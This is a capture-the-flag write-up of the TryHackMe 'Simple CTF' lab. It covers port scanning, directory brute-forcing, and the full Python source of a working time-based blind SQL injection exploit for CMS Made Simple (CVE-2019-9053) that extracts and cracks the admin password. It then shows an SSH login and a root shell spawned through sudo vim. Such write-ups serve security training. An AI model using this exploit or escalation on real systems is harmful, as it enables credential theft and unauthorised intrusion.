
Simple CTF - TryHackMe

Ludovic COULON
May 12th, 2020 · 1 min read

TryHackMe | Simple CTF

Deploy the machine and attempt the questions!

Setup

kali@kali:~$ sudo nmap -A -vv 10.10.229.200
21/tcp   open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.2.228
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status

80/tcp   open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY=
|   256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK

#1 How many services are running under port 1000?

Discovered open port 21/tcp on 10.10.229.200
Discovered open port 80/tcp on 10.10.229.200
Discovered open port 2222/tcp on 10.10.229.200

2

#2 What is running on the higher port?

2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

ssh

#3 What’s the CVE you’re using against the application?

kali@kali:~$ gobuster dir -u 10.10.229.200 -w /usr/share/wordlists/rockyou.txt

https://imgur.com/1MbQj3P.png

https://imgur.com/hRVpvg2.png

Disallow: /openemr-5_0_1_3

After some research I found an SQL injection for CMS Made Simple.

CMS Made Simple SQL Injection

CVE-2019-9053

#4 To what kind of vulnerability is the application vulnerable?

sqli # (SQL Injection)

#5 What’s the password?

#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
#
# Python 2 script (print statements, str-based md5 input). Time-based blind
# injection: each candidate character is confirmed when the response is
# delayed by at least TIME seconds.

import requests
from termcolor import colored
import time
from termcolor import cprint
import optparse
import hashlib

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)

options, args = parser.parse_args()
if not options.url:
    print "[+] Specify an url target"
    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
    exit()

url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
flag = True
password = ""
temp_password = ""
TIME = 1
db_name = ""
output = ""
email = ""

salt = ''
wordlist = ""
if options.wordlist:
    wordlist += options.wordlist

def crack_password():
    # CMSMS stores md5(salt + password); try each wordlist entry against the dumped hash.
    global password
    global output
    global wordlist
    global salt
    dict = open(wordlist)
    for line in dict.readlines():
        line = line.replace("\n", "")
        beautify_print_try(line)
        if hashlib.md5(str(salt) + line).hexdigest() == password:
            output += "\n[+] Password cracked: " + line
            break
    dict.close()

def beautify_print_try(value):
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])
    cprint('[*] Try: ' + value, 'red', attrs=['bold'])

def beautify_print():
    global output
    print "\033c"
    cprint(output,'green', attrs=['bold'])

def dump_salt():
    global flag
    global salt
    global output
    ord_salt = ""
    ord_salt_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_salt = salt + dictionary[i]
            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_salt)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            salt = temp_salt
            ord_salt = ord_salt_temp
    flag = True
    output += '\n[+] Salt for password found: ' + salt

def dump_password():
    global flag
    global password
    global output
    ord_password = ""
    ord_password_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_password = password + dictionary[i]
            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_password)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            password = temp_password
            ord_password = ord_password_temp
    flag = True
    output += '\n[+] Password found: ' + password

def dump_username():
    global flag
    global db_name
    global output
    ord_db_name = ""
    ord_db_name_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_db_name = db_name + dictionary[i]
            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_db_name)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            db_name = temp_db_name
            ord_db_name = ord_db_name_temp
    output += '\n[+] Username found: ' + db_name
    flag = True

def dump_email():
    global flag
    global email
    global output
    ord_email = ""
    ord_email_temp = ""
    while flag:
        flag = False
        for i in range(0, len(dictionary)):
            temp_email = email + dictionary[i]
            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
            beautify_print_try(temp_email)
            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
            url = url_vuln + "&m1_idlist=" + payload
            start_time = time.time()
            r = session.get(url)
            elapsed_time = time.time() - start_time
            if elapsed_time >= TIME:
                flag = True
                break
        if flag:
            email = temp_email
            ord_email = ord_email_temp
    output += '\n[+] Email found: ' + email
    flag = True

dump_salt()
dump_username()
dump_email()
dump_password()

if options.cracking:
    print colored("[*] Now try to crack password")
    crack_password()

beautify_print()

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

#6 Where can you login with the details obtained?

ssh # open ssh port 2222

#7 What’s the user flag?

kali@kali:~$ ssh mitch@10.10.229.200 -p 2222
mitch@10.10.229.200's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!

#8 Is there any other user in the home directory? What’s its name?

$ cd /home
$ ls
mitch sunbath

#9 What can you leverage to spawn a privileged shell?

$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

We can run vim as root without a password, so let's use it to spawn a root shell.

$ sudo vim -c ":!/bin/sh"

$ id
uid=0(root) gid=0(root) groups=0(root)

#10 What’s the root flag?

$ cd /root/
$ ls
root.txt
$ cat root.txt
W3ll d0n3. You made it!

© 2020 Ludovic COULON